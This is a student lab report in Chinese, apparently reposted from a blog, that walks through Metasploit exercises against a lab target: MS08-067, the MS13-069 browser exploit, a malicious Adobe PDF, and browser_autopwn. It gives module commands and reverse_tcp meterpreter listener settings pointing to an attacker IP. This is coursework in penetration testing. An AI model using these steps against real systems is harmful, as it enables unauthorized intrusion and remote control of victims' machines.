2018-2019-2 20165337《网络攻防技术》Exp5 MSF基础应用

本文详细介绍了使用Metasploit框架进行网络安全渗透测试的过程,包括利用MS08_067、MS13_069漏洞及Adobe客户端漏洞进行主动攻击、针对浏览器的攻击和客户端攻击,以及使用browser_autopwn模块自动化渗透。文章通过具体步骤演示了如何设置参数、生成攻击文件和监听程序,最终获取目标系统的权限。

一、实践目标

1.一个主动攻击实践

ms08_067

2.一个针对浏览器的攻击

ms13-069

3.一个针对客户端的攻击

adobe (Adobe_toolbutton客户端漏洞)

4.成功应用任何一个辅助模块

auxiliary/server/browser_autopwn模块

问题回答:

用自己的话解释什么是exploit,payload,encode
exploit:用来打开攻击者与被攻击者的通道,开始攻击。核弹头
payload:攻击载荷,用什么方式攻击。核弹载具
encode:进行编码,让它不被发现。隐形轰炸机

二、实验内容

1.主动攻击(ms08_067)

首先输入nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶机IP地址查看靶机是否存在该漏洞

1296836-20190421194353451-485818475.png

然后在攻击机Kali的命令行中输入msfconsole进入控制台
输入use exploit/windows/smb/ms08_067_netapi使用这个漏洞
之后输入show options查看需要设置的参数

1296836-20190421194514543-1911310178.png

设置完靶机地址就可以完成
输入exploit进行攻击

1296836-20190421194730010-1350201169.png

2.针对浏览器的攻击(ms13-069)

首先search ms13找到ms13-069

1296836-20190421195406400-244701459.png

输入use exploit/windows/browser/ms13_069_caret
输入show options
查看需要设置的参数

1296836-20190421195452956-397714773.png

设置参数:
srvhost 192.168.1.154
srvport 80
set payload windows/meterpreter/reverse_tcp
lhost 192.168.1.154
输入exploit进行攻击

1296836-20190421195851556-643470302.png

攻击成功获取权限

1296836-20190421200029844-24040352.png

3.一个针对客户端的攻击(Adobe_toolbutton)

首先在msfconsole控制台中search adobe

1296836-20190421200840431-1060353708.png

之后use exploit/windows/fileformat/adobe_toolbutton

1296836-20190421200923237-442319582.png

生成攻击文件msf.pdf

1296836-20190421201025357-1708877508.png

将这个文件传入靶机

设置监听程序use exploit/mutil/handler

1296836-20190421201114445-2040174909.png

设置攻击机IP 192.168.1.154
设置攻击机端口4444
设置set payload windows/meterpreter/reverse_tcp
输入exploit进行攻击
在靶机上打开PDF文件

1296836-20190421201311494-1419312671.png

攻击成功获取权限

1296836-20190421201334489-62730859.png

4.成功应用辅助模块(auxiliary/server/browser_autopwn模块)

Metasploit中提供了一个browser autopwn模块,这是一个可以用来对各种浏览器进行测试和渗透的自动化向量。
autopwn指的是自动对目标进行渗透。autopwn模块在配置了所有要使用的浏览器渗透脚本后,将处于监听模式下。然后,它便等待着一个即将到来的连接。一旦连接建立,它就会发送一系列与目标浏览器相匹配的渗透模块,具体发送哪个模块要取决于受害者浏览器的类型。无论目标系统上运行着什么浏览器,只要存在漏洞,autopwn模块就能自动发起攻击。

在msfconsole中搜索autopwn
输入use auxiliary/server/browser_autopwn
之后输入show options查看需要设置的参数

1296836-20190421202104544-1863583185.png

设置参数:
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.154
set URIPATH "20165337yy"
输入exploit进行攻击

1296836-20190421202207582-1726556748.png

1296836-20190421202419821-289926126.png

输入session -i 1成功获得权限

1296836-20190421202441103-1290916565.png

三、实验总结:

离实战还缺些什么技术或步骤?

只能攻击最低级的漏洞,靶机稍微有点防护能力就无法进攻,还是拷贝同学的一款容易攻破的靶机完成的实验

实验感想

最难的就是找到合适的靶机,之前自己找了很多靶机一个都不能成功,当时心都碎了。找了一堆淘汰了不知道多久的xp系统都无法攻破。后来用同学的靶机才顺利完成实验。总结下来只有靶机心甘情愿甚至全力配合,我才能攻击成功...

转载于:https://www.cnblogs.com/y963976867/p/10746603.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值